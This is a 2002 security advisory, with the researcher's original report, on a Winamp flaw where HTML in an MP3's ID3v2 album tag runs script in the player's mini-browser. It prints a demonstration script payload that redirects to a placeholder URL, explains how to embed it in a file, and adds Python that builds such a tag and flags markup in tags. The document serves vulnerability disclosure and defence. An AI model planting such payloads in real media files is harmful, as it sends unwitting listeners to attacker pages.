Winamp MP3 Player Lets Malicious MP3 Files Control the Winamp Mini-browser and Cause Arbitrary HTML Scripts to Be Executed
SecurityTracker Alert ID: 1003963
SecurityTracker URL: http://securitytracker.com/id/1003963
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 4 2002
Impact: Execution of arbitrary code via local system
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 2.78c, 2.79
Description:
A vulnerability was reported in the Winamp MP3 player. A remote user can create an MP3 file that, when played by Winamp, may be able to cause the Winamp mini-browser to execute arbitrary Javascript.
Winamp reportedly contains a built-in mini web browser that is enabled by default and displays information about audio files being played. Winamp will apparently direct the mini-browser to a URL at winamp.com, such as the following:
http://info.winamp.com/winamp/WA.html?Alb=&Art=LoveProject&Cid=winamp&Tid=&Track=Brick
Certain elements of this URL (e.g., title, artist, album) are determined based on the ID3v1/ID3v2 tag contained in the MP3 file. According to the report, Winamp's own web site does not filter "<" and ">" characters, allowing a remote user to make an MP3 file that, when played by Winamp, will cause malicious code to be executed by the mini-browser appearing to originate from the winamp web site [this cross-site scripting flaw in the winamp web site has since been corrected].
The following demonstration exploit ID3v2 tag is provided:
<mp3 id=m src=http://ANYURL><script>location=m.src</script>
The above demonstration exploit URL will reportedly direct the Winamp user to http://ANYURL when the MP3 file is loaded.
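As an added illustration (not code from the advisory or from Winamp): the backslash quote-escaping the report says the winamp.com page applied, beside proper HTML escaping, plus a small ID3v2.3 text-frame parser that pulls the album (TALB) field out of a constructed tag so a defender can flag tag text carrying markup. The function names and the HTML fragment are hypothetical stand-ins for the real WA.html page.

```python
import html
import struct

# Constructed sample: the demonstration album string quoted in the advisory.
ALBUM_PAYLOAD = "<mp3 id=m src=http://ANYURL><script>location=m.src</script>"

def weak_escape(value: str) -> str:
    """The server-side measure the advisory describes: only quotes get a backslash.
    Angle brackets pass through, so markup in the tag still reaches the page."""
    return value.replace('"', '\\"').replace("'", "\\'")

def render_track_info(album: str, escaper=html.escape) -> str:
    """Hypothetical stand-in for the WA.html fragment showing the album field."""
    return f"<p>Album: {escaper(album)}</p>"

def contains_script(rendered: str) -> bool:
    """True if a live <script> tag survived into the rendered fragment."""
    return "<script" in rendered.lower()

def build_id3v2_tag(album: str) -> bytes:
    """Construct a minimal ID3v2.3 tag holding one TALB (album) text frame."""
    text = b"\x00" + album.encode("latin-1")   # encoding byte 0 = ISO-8859-1
    frame = b"TALB" + struct.pack(">I", len(text)) + b"\x00\x00" + text
    n = len(frame)                              # tag size is 4 syncsafe bytes
    syncsafe = bytes(((n >> 21) & 0x7F, (n >> 14) & 0x7F, (n >> 7) & 0x7F, n & 0x7F))
    return b"ID3\x03\x00\x00" + syncsafe + frame

def id3v2_text_frames(data: bytes) -> dict:
    """Parse ID3v2.3 text frames (T***, ISO-8859-1 only) into {frame_id: text}."""
    if len(data) < 10 or data[:3] != b"ID3" or data[3] != 3:
        return {}
    size = (data[6] << 21) | (data[7] << 14) | (data[8] << 7) | data[9]
    pos, end, frames = 10, 10 + size, {}
    while pos + 10 <= end:
        fid = data[pos:pos + 4]
        if fid == b"\x00\x00\x00\x00":          # padding: no more frames
            break
        fsize = struct.unpack(">I", data[pos + 4:pos + 8])[0]  # v2.3: plain big-endian
        body = data[pos + 10:pos + 10 + fsize]
        if fid.startswith(b"T") and body[:1] == b"\x00":
            frames[fid.decode("ascii")] = body[1:].rstrip(b"\x00").decode("latin-1")
        pos += 10 + fsize
    return frames

def frames_with_markup(data: bytes) -> list:
    """Defender-side check: ID3v2 text frames that carry angle brackets."""
    return [fid for fid, text in id3v2_text_frames(data).items() if "<" in text or ">" in text]
```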
Impact:
A remote user can create a malicious MP3 file that may, in conjunction with a remote web site, be able to cause arbitrary JavaScript to be executed by the mini-browser when the MP3 file is played.
Solution:
No solution was available at the time of this entry.
[Note that the cross-site scripting flaw on the Winamp web site has been fixed.]
Vendor URL: www.winamp.com/
Cause:
Input validation error, State error
Underlying OS:
Windows (Any)
Message History:
None.
Source Message Contents
Date: Wed, 3 Apr 2002 13:23:17 +0200 (CEST)
Subject: Winamp: Mp3 file can control the minibrowser
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Title: Winamp: Mp3 file can control the minibrowser
Date: [2002-04-3]
Tested env: Winamp 2.78c, 2.79 with Win2000 Pro
Impact: A specially crafted mp3 file can control the minibrowser, such as directing to an arbitrary webpage possibly containing malicious html code. Also another "call home" issue.
Status: Winamp contacted over two weeks ago, no response.
Vendor fix: None. The fix should be on the server side.
Workaround: Disable minibrowser (enabled by default).
Author: Andreas Sandblad, sandblad@acc.umu.se
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
PROBLEM:
Winamp has a built-in minibrowser to show information about songs being
played (enabled by default). For every song currently playing Winamp will
direct the minibrowser to a URL like
http://info.winamp.com/winamp/WA.html?Alb=&Art=LoveProject&Cid=winamp&Tid=&Track=Brick
Winamp gets the title/artist/album information from the ID3v1/ID3v2 tag in
the mp3 file. The problem is that the html page doesn't filter "<" and ">"
characters, making it possible to inject html code to control the
minibrowser (yet another CSS problem).
EXPLOIT:
Every field in the ID3v1 tag is limited to max. 32 bytes, so we use the
ID3v2 tag instead. It seems that Winamp has made some useless efforts to
stop our attack, namely to convert " and ' to \" and \' (server side).
This will of course not stop us.
So let's put the following html code in the album field of the ID3v2 tag of
our mp3 file:
<mp3 id=m src=http://ANYURL><script>location=m.src</script>
It will direct the user to http://ANYURL on load.
Adding an ID3v2 tag to an mp3 file is very simple. Open the file in Winamp,
right click on it and choose "File info". Unmark the ID3v1 tag and mark
ID3v2. Add the html code in the album field. Sometimes Winamp will
complain when creating the ID3v2 tag with some characters. Then you simply
have to hexedit the mp3 file instead.
_ _
o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
Andreas Sandblad, student in Engineering Physics
at the University of Umea, Sweden.
---------------------------------------------------------------